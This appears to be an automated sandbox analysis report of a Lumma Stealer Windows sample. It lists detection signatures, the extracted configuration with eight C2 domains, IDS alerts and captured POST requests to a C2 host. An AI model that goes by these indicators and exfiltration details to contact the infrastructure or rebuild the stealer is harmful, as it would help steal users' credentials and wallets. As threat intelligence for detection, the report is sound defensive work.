Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532904
MD5:e6f6b8cea53e7f4747e424f1617f3393
SHA1:59c199c720a2e106822defba032c2eb90f9699da
SHA256:95b1cfb989f22fc872400433acaa047fc01be081433137307523e4d116390598
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E6F6B8CEA53E7F4747E424F1617F3393)
    • WerFault.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["dissapoiznw.store", "spirittunek.store", "mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:07.578747+020020546531A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
    2024-10-14T06:52:08.724141+020020546531A Network Trojan was detected192.168.2.449732104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:07.578747+020020498361A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:08.724141+020020498121A Network Trojan was detected192.168.2.449732104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.233741+020020564771Domain Observed Used for C2 Detected192.168.2.4585541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.178120+020020564711Domain Observed Used for C2 Detected192.168.2.4615541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.211010+020020564811Domain Observed Used for C2 Detected192.168.2.4532091.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.200339+020020564831Domain Observed Used for C2 Detected192.168.2.4631691.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.267741+020020564731Domain Observed Used for C2 Detected192.168.2.4511531.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.189242+020020564851Domain Observed Used for C2 Detected192.168.2.4537661.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.250603+020020564751Domain Observed Used for C2 Detected192.168.2.4505471.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:05.221679+020020564791Domain Observed Used for C2 Detected192.168.2.4586281.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T06:52:06.634065+020028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.6988.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "spirittunek.store", "mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for domain / URL
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://bathdoomgaz.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://licendfilteo.site:443/apiVirustotal: Detection: 19%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: https://dissapoiznw.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: https://sergei-esenin.com/0Virustotal: Detection: 15%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0053D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0053D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005799D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0053FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00540EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00575700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00546F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0054D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00573920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_005349A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00535A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00574A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00541A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00541ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005442FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00579B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0053A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00543BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00541BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0054D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0055C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0054B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00579CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00579CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00559510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0055FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00546536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00541E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0053BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00546EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00536EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00546F91

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:53209 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:58628 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:63169 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53766 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:61554 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50547 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:58554 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:51153 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.53.8:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sru `Qo equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=7f29bf101b41067af1b6c20b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 14 Oct 2024 04:52:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bathdoomgaz.store:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
